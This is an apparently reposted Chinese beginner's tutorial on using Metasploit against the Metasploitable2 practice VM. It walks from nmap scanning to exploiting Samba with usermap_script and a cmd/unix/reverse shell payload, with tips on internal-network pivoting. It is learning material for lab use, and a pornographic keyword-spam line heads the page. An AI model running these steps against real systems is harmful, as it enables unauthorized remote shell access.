日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Metasploit入门用法(主动攻击)

發(fā)布時間:2023/12/2 编程问答 55 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Metasploit入门用法(主动攻击) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

–作者:CV

本文主要講metasploit的入門用法,還有一些滲透細節(jié)和思路,有不足的,歡迎互相學(xué)習(xí)研究。本人區(qū)別于書籍的特點是:書籍以模塊為劃分,我是以連續(xù)的步驟進行書寫,更突出一次滲透的思路,同時我會通過強調(diào)步驟的細節(jié)技巧,用以拓展相關(guān)類容。

由于我現(xiàn)在對metasploit的深入度并不足,只能使用metasploit做一些初級入門的系統(tǒng)測試,一下是常規(guī)步驟和方法:

1、 使用nmap進行端口掃描
2、 使用search命令查找相關(guān)模塊
3、 使用use調(diào)度模塊
4、 使用info查看模塊信息
5、 選擇payload作為攻擊
6、 設(shè)置攻擊參數(shù)
7、 滲透攻擊
如果第二次看我文章,建議通過以上七個步驟回憶操作,實在記不住再看后面步驟詳解,以達到掌握的效果。

詳解:
首先是安裝metasploit和nmap(后期也會出一個這個工具的學(xué)習(xí)筆記),至于安裝方法,請根據(jù)您使用的系統(tǒng)來百度。百度是初學(xué)者必備,如果深入建議使用Google。我們這次滲透的靶機,是metasploitable2。

1. 使用nmap進行端口掃描,

由于本人技術(shù)初級階段,所以只能檢測系統(tǒng)漏洞。檢查系統(tǒng)漏洞的關(guān)鍵,就是檢測端口的開放,這個也是metasploit種exploit模塊經(jīng)常要設(shè)置參數(shù)的原因,所以nmap很好的解決了這個需求,通常使用:nmap –sV IP(或者域名),如果機器設(shè)置有防火墻禁ping,可以使用nmap -P0(或者-Pn) –sV IP(或者域名),通過這兩個命令可以查看主機的開放情況:

如圖,可以看到靶機開放的端口,開放狀態(tài),服務(wù)類型,和版本號,其中滲透最重要的兩個參數(shù)是開放狀態(tài)和版本號。如果端口是關(guān)閉的,那就不可能滲透了,一般是防火墻過濾了,但如果是過濾的話,還是可以嘗試攻擊(我沒成功過,應(yīng)該有一定可能成功);版本號也就是系統(tǒng)掃描中,在開發(fā)安全掃描件里經(jīng)常提及的漏洞指紋,因為大部分漏洞的產(chǎn)生就是某一版本的問題。
我們此次攻擊的139端口,如圖中,可以看到服務(wù)的指紋信息,主要就是服務(wù)名稱和版本號,是叫samba的服務(wù),處于3.X-4.X版本。

此步強調(diào):

a、 nmap的參數(shù)居多,但是可以通過英語簡寫記,比如:-sV :s 技術(shù)scan ,V就是version。(我英語不好,也不知道是不是對的)
b、 通過nmap主要是知道端口開放情況(STATE)和指紋信息(服務(wù)名稱和版本號),然后可以根據(jù)指紋信息百度,該版本是否存在漏洞,然后按百度操作證明。

2.使用search命令查找相關(guān)模塊

就剛才我們鎖定的139端口的版本信息,我們可以通過search命令查找相關(guān)的掃描腳本。命令格式:search Name。本例就是:search samba

如圖,加班也有很多屬性,其中最重要的就是他的等級,一般有限選擇excellent和great兩種等級,因為穩(wěn)定且效果明顯,其次重要的就是后面的描述是否和我們攻擊的服務(wù)有關(guān),最后記住需要的模塊,在后面攻擊是使用。

此步強調(diào):

a、 攻擊模塊的等級很重要,依次選擇excellent和great,其他模塊并不是很好或者效果不明顯。(后期我可能出一個metasploit二次開發(fā)的編程,使用腳本,可以簡單快速的進行滲透,并且解決低等級模塊多,手工慢的特點。)
b、 英語非常重要,但是要求也不高,能把提示看懂就行,這個對滲透幫助巨大,因為大部分好的開源工具都是英文提示。
c、 還有圖中第二行沒有標明的一個問題,說我沒有建立數(shù)據(jù)庫,建議大家在使用metasploit以前,打開postgresql數(shù)據(jù)庫,有很多難度姿勢需要依賴,在此我就不舉例了。

3.使用use調(diào)度模塊

找到了我們需要攻擊的目標模塊,我們就使用它,通過命令:use ExploitName 。該例就是:use exploit/multi/samba/usermap_script。

如圖,出現(xiàn)第二行,就是說明模塊加載成功。
技巧:如果是知道使用哪個模塊,可以輸入每個 / 后的前2-4個字母使用table補齊,或者直接復(fù)制剛才找到模塊。(建議大家都使用Linux操作系統(tǒng),只需要命令就能解決很多問題,而且本人偏開發(fā),在開發(fā)的時候,Linux使用也會比Windows多些優(yōu)勢)

4.使用info查看模塊信息

這步最簡單,就是在上步的基礎(chǔ)上,輸入info就行:

主要就是看圖中標紅的描述,確定是否針對漏洞(該步基本可省略,但是為了了解學(xué)習(xí),還是建議看看)

5.選擇payload作為攻擊

選擇payload,首先我們要看能使用哪些參數(shù),通過命令:show payloads:

在選擇攻擊載荷的時候,建議選用和meterpreter和reverse相關(guān)的載荷,本次攻擊就選用圖中標紅的。
通過使用命令:set payload PayloadName。該例為:set payload cmd/unix/reverse:

出現(xiàn)第二行,表示設(shè)置成功。
技巧:
a、 meterpreter在metasploit中有什么瑞士尖刀的稱呼,可以很好的做到后滲透攻擊以及內(nèi)網(wǎng)滲透,可以參看meterpreter使用。
b、 reverse解釋是反彈,由于你攻擊的目標機可能處在內(nèi)網(wǎng)里,所以你攻擊的時候存在端口映射等方面的問題,所以如果使用反彈,這個可以更穩(wěn)定。(我是這么理解的,建議百度反彈shell,玄魂的解釋挺不錯)

6.設(shè)置攻擊參數(shù)

首先通過show options或者options,查看需要填寫的參數(shù):

其中標紅處如果是yes,表示這行參數(shù)必須填寫,如果是no,就是選填,其中有LHOST和RHOST是空,我們根據(jù)后面的描述,填上靶機和本地主機的信息。

RHOST 填寫目標機IP,LHOST填寫本機IP。
技巧:
a、 在真實的環(huán)境中,RPORT可能并不是默認的參數(shù),由于一個服務(wù)是放在內(nèi)網(wǎng)當中,他通過路由器轉(zhuǎn)發(fā),可能會出現(xiàn)端口的變化(端口映射),比如我們剛才掃描出該服務(wù)的端口可能就不是139,而是XXX,這個時候,我們就要設(shè)置RPORT為XXX,這點非常重要。
b、 exploit target也是非常重要的參數(shù),在你確切的知道目標的系統(tǒng)的時候,可以通過show targets,查看目標系統(tǒng)有哪些:

查看目標的系統(tǒng),可以使用:nmap –O IP,然后使用set target ID選擇目標類型,主要用于增加成功率。
c、 由于本機的IP在內(nèi)網(wǎng),所以基本不會變,可以使用setg代替set,這樣在手工的時候換攻擊模塊,少輸入幾個字母。

7.滲透攻擊

上面參數(shù)填好后,應(yīng)該是如下情況:

就是參數(shù)完整,然后使用exploit或者run就行了,對于部分攻擊模塊,可以使用check來判斷:

圖中的靶機ip由于我是通過虛擬機主機模式做的,所以ip和端口都是原生的,但如果是滲透到內(nèi)網(wǎng)的某個主機,那顯示的本地地址可能和你的攻擊地址產(chǎn)生不同,這個時候就恭喜你的滲透到內(nèi)網(wǎng),你可以通過使用添加路由的方式,進行內(nèi)網(wǎng)滲透(后面看情況出該章節(jié))。
技巧:使用check判斷,不會生成session,這樣就不會暴露自己的ip地址,但是也就不能getshell。

8.后滲透攻擊

這一部分主要是meterpreter模塊的使用,以及部分提權(quán),由于和這章關(guān)系不大,所以就沒列入最前面的列表,后期會出一個相關(guān)學(xué)習(xí)筆記。

總結(jié)(非常重要):

a、 英語很重要,就算不學(xué)太多單詞,在使用工具中出現(xiàn)的單詞,建議查找記憶。
b、 在文章中沒提出在計算機中用的最常見的一個參數(shù) “-h”,就算help,很多操作都可以通過幫助來使用,所以再次說明英語重要。
c、 參數(shù)眾多的情況下,就記住主要的參數(shù),比如本文針對exploit模塊,基本常用的命令(除了show advanced 和設(shè)置其中的參數(shù))

關(guān)于metasploit方面推薦學(xué)習(xí)demon表哥的博客:www.ggsec.cn,視屏更多。
本人初學(xué)習(xí)滲透知識,文中可能有一定紕漏,如果有大表哥發(fā)現(xiàn),麻煩請斧正,聯(lián)系QQ:617088553。

推廣:

一些好群推薦:
漏洞銀行技術(shù)1群:477761459
漏洞銀行新手特訓(xùn)營:435418650

CV,Ctrl+C、Ctrl+V;只做姿勢的搬運工,希望對入門的朋友有所幫助。
文章歡迎轉(zhuǎn)載,同時版權(quán)歸本人所有,如商業(yè)用途,歡迎合作共贏。

總結(jié)

以上是生活随笔為你收集整理的Metasploit入门用法(主动攻击)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。